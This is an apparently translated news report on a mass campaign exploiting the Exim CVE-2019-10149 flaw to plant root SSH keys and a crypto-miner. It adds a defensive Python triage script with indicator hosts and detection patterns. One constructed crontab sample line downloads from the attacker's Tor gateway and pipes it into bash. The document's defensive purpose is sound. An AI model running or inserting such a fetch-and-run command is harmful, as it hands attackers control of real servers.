Mass attack on vulnerable Exim-based mail servers

Security researchers at Cybereason have warned mail server administrators that a mass attack is under way exploiting the critical vulnerability (CVE-2019-10149) in Exim that was disclosed last week. In the attack, the attackers achieve execution of their code with root privileges and install cryptocurrency-mining malware on the server.

According to the June automated survey, Exim's share of mail servers is 57.05% (56.56% a year ago), Postfix is used on 34.52% (33.79%), Sendmail on 4.05% (4.59%) and Microsoft Exchange on 0.57% (0.85%). According to the Shodan service, more than 3.6 million mail servers on the global network remain potentially vulnerable because they have not been updated to the current Exim release, 4.92. About 2 million of the potentially vulnerable servers are located in the United States and 192 thousand in Russia. According to RiskIQ, 70% of servers running Exim have already moved to version 4.92.


Administrators are advised to urgently install the updates that distributions prepared last week (Debian, Ubuntu, openSUSE, Arch Linux, Fedora, EPEL for RHEL/CentOS). If a system runs a vulnerable version of Exim (4.87 through 4.91 inclusive), you should verify that it has not already been compromised: inspect crontab for suspicious entries and confirm that no additional keys have appeared in /root/.ssh. An attack may also be indicated by firewall log entries showing activity involving the hosts an7kmd2wp4xo7hpr.tor2web.su, an7kmd2wp4xo7hpr.tor2web.io and an7kmd2wp4xo7hpr.onion.sh, which are used to download the malware.

The first attempts to attack Exim servers were recorded on June 9. On June 13 the attack took on a mass character. After exploiting the vulnerability through tor2web gateways, a script is downloaded from a Tor hidden service (an7kmd2wp4xo7hpr) that checks for the presence of OpenSSH (installing it if absent), changes its settings (enabling root login and key-based authentication) and adds an RSA key for the root user, giving privileged access to the system over SSH.

After the backdoor is set up, a port scanner is installed on the system to identify other vulnerable servers. The system is also searched for existing mining software, which is removed if found. Finally, the attackers' own miner is downloaded and registered in crontab. The miner is downloaded disguised as an .ico file (in fact a zip archive with the password "no-password") containing an executable in ELF format for Linux with Glibc 2.7+.
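The checks recommended above (affected Exim version range, crontab entries, extra keys in /root/.ssh, firewall log references to the download hosts) as a small offline triage script. This is an added example, not code from the article or from Cybereason; the crontab, authorized_keys and firewall log samples are constructed, and the key blobs and admin allow-list are placeholders.

```python
"""Triage helpers for the Exim CVE-2019-10149 campaign. Sample inputs are constructed."""
import re

# Download hosts named in the article.
IOC_HOSTS = ("an7kmd2wp4xo7hpr.tor2web.su", "an7kmd2wp4xo7hpr.tor2web.io",
             "an7kmd2wp4xo7hpr.onion.sh")
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")   # prefixes of authorized_keys key-type tokens

def exim_version_affected(version):
    """True for Exim 4.87 through 4.91 inclusive; 4.92 carries the fix."""
    m = re.match(r"(\d+)\.(\d+)", version)
    if not m:
        raise ValueError("unparseable Exim version: %r" % version)
    return (4, 87) <= (int(m.group(1)), int(m.group(2))) <= (4, 91)

def suspicious_crontab_lines(text):
    """Non-comment crontab entries referencing the IOC hosts, Tor gateways,
    or piping a remote download straight into a shell."""
    pipe_to_shell = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
    return [s for s in (l.strip() for l in text.splitlines())
            if s and not s.startswith("#")
            and (any(h in s for h in IOC_HOSTS) or "tor2web" in s
                 or ".onion" in s or pipe_to_shell.search(s))]

def unexpected_authorized_keys(text, known_keys):
    """Keys in /root/.ssh/authorized_keys whose (type, base64) pair is not on the
    administrator's allow-list. Option prefixes such as from="..." are skipped."""
    found = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(parts):
            continue                      # no key material on this line
        if (parts[idx], parts[idx + 1]) not in known_keys:
            found.append(" ".join(parts[idx:idx + 3]))
    return found

def ioc_firewall_lines(text):
    """Firewall log lines that mention any of the IOC hosts."""
    return [l for l in text.splitlines() if any(h in l for h in IOC_HOSTS)]

# Constructed samples (placeholder key blobs, invented hostnames in the benign lines).
CRONTAB_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s http://an7kmd2wp4xo7hpr.tor2web.su/x | bash
"""
AUTHKEYS_SAMPLE = """from="10.0.0.5" ssh-ed25519 AAAAC3EXAMPLEADMINKEY admin@bastion
ssh-rsa AAAAB3EXAMPLEUNKNOWNKEY
"""
KNOWN_ROOT_KEYS = {("ssh-ed25519", "AAAAC3EXAMPLEADMINKEY")}
FWLOG_SAMPLE = """Jun 13 04:12:01 mx1 kernel: OUT DST=an7kmd2wp4xo7hpr.tor2web.io DPT=80
Jun 13 04:12:05 mx1 kernel: OUT DST=deb.debian.org DPT=80
"""
```

Run each function over the real /etc/crontab, per-user crontabs, /root/.ssh/authorized_keys and the firewall log; any non-empty result warrants treating the host as compromised rather than merely patching it.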

Source: opennet.ru
